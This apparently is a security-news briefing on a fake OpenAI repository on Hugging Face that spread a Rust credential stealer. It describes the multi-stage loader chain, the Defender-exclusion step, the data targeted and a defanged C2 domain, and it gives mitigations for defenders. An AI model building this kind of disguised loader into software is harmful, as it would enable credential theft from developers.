LIVE FEED
FIRST LOOK First Look: MoEngage Acquires Aampe to Deploy Millions of Autonomous AI Marketing Agents // FIRST LOOK First Look: Dragos Launches EmberAI, an OT-Specific AI Security Intelligence Platform // FIRST LOOK First Look: Mistral AI Ships OCR 4 with Structured Document Extraction for RAG Pipelines // HIGH Malicious Pull Requests Compromise AI and Developer Toolchains via CI/CD Flaws // CRITICAL Anthropic's Mythos AI Breached Classified US Government Systems in Hours // FIRST LOOK Cisco and NVIDIA AI Agent Skill Scanners Bypassed by Fake Marketplace Skill // HIGH Legacy Infrastructure Becomes Primary Attack Path into Enterprise AI Agents // HIGH Role Confusion Attack Lets Injected Text Override LLM Safety Controls // FIRST LOOK First Look: OpenAI Launches 'Patch the Planet' Open-Source Vulnerability Remediation … // HIGH AutoJack Vulnerability Chain Enabled Remote Code Execution via AI Agent WebSocket //
ATLAS OWASP HIGH Significant risk · Prioritise patching Supply Chain Industry News LLM Security RELEVANCE ▲ 8.2

Fake OpenAI Repository on Hugging Face Delivers Rust-Based Infostealer

SOURCE BleepingComputer ↗
TL;DR HIGH
  • What happened: Typosquatted Hugging Face repo impersonating OpenAI delivered Rust infostealer to 244,000 downloaders.
  • Who's at risk: AI/ML developers and researchers who install models from Hugging Face without verifying repository authenticity are most exposed.
  • Act now: Audit any recently installed Hugging Face packages, especially those referencing OpenAI projects · Implement code review of loader scripts before executing any downloaded ML repository files · Enforce allowlists for trusted Hugging Face organisations and verify model card authenticity before download
Fake OpenAI Repository on Hugging Face Delivers Rust-Based Infostealer

Overview

A threat actor created a fraudulent Hugging Face repository named Open-OSS/privacy-filter that typosquatted OpenAI’s legitimate ‘Privacy Filter’ project. Discovered by HiddenLayer researchers on May 7, 2026, the repository briefly reached the #1 spot on Hugging Face’s trending list and recorded approximately 244,000 downloads before the platform removed it following reports. The campaign demonstrates how adversaries are actively exploiting the trust and discoverability mechanics of AI model-sharing platforms to distribute malware at scale.

Technical Analysis

The attack employed a multi-stage delivery chain designed to evade detection:

  1. Lure Layer: The repository copied OpenAI’s legitimate model card nearly verbatim, presenting a convincing facade to researchers and developers browsing trending AI tools.

  2. Loader Script (loader.py): A Python file included superficial AI-related code for camouflage. Behind this facade, it:

    • Disabled SSL certificate verification
    • Decoded a base64-encoded URL pointing to an external resource
    • Fetched and executed a JSON payload containing an embedded PowerShell command

  3. PowerShell Stage: Executed silently in a hidden window, the command downloaded start.bat, which:

    • Performed privilege escalation
    • Downloaded the final payload (sefirah)
    • Added the payload to Microsoft Defender’s exclusion list
    • Executed the payload

  4. Final Payload — Rust Infostealer (sefirah): A capable Rust-based credential harvester targeting:

    • Browser data (cookies, passwords, session tokens, encryption keys) from Chromium and Gecko browsers
    • Discord tokens, local databases, and master keys
    • Cryptocurrency wallets and wallet browser extensions
    • SSH, FTP, and VPN credentials including FileZilla configurations
    • Sensitive local files and wallet seeds/keys
    • System information and multi-monitor screenshots

Stolen data is compressed and exfiltrated to a C2 server at recargapopular[.]com. The malware also incorporates extensive anti-analysis capabilities, including VM, sandbox, and debugger detection.

Framework Mapping

  • AML.T0010 — ML Supply Chain Compromise: The attack directly targets the AI/ML development pipeline by weaponising a trusted model-sharing platform to distribute malicious packages.
  • AML.T0019 — Publish Poisoned Datasets/Repositories: The adversary published a poisoned repository with a near-identical model card to deceive users.
  • AML.T0047 — ML-Enabled Product or Service: The attack exploits user trust in legitimate AI tooling ecosystems.
  • LLM05 — Supply Chain Vulnerabilities: The incident is a textbook example of third-party AI component compromise through a trusted distribution channel.

Impact Assessment

With 244,000 downloads recorded before removal, the potential victim pool is significant. Any Windows user who installed and executed code from this repository may have had browser credentials, cryptocurrency assets, SSH/VPN configurations, and session tokens exfiltrated. The attack is particularly dangerous for AI researchers, MLOps engineers, and developers who routinely install packages from Hugging Face as part of their workflow and may not scrutinise loader scripts closely.

Mitigation & Recommendations

  • Immediate: Check systems for the presence of sefirah or related artefacts; rotate all credentials stored in affected browsers and SSH/VPN configurations.
  • Network: Block connections to recargapopular[.]com and monitor for outbound traffic to unknown C2 infrastructure.
  • Process: Establish code review requirements for any Python scripts (loader.py patterns) downloaded from ML repositories before execution.
  • Platform Hygiene: Only install models from verified organisations on Hugging Face; cross-reference repositories against official vendor GitHub/documentation links.
  • Detection: Deploy behavioural monitoring for PowerShell execution spawned from Python processes, particularly those running in hidden windows.

References

◉ AI THREAT BRIEFING

Stay ahead of the threat.

Twice-weekly digest of critical AI security developments — every story mapped to MITRE ATLAS and OWASP LLM Top 10. Free.

No spam. Unsubscribe anytime.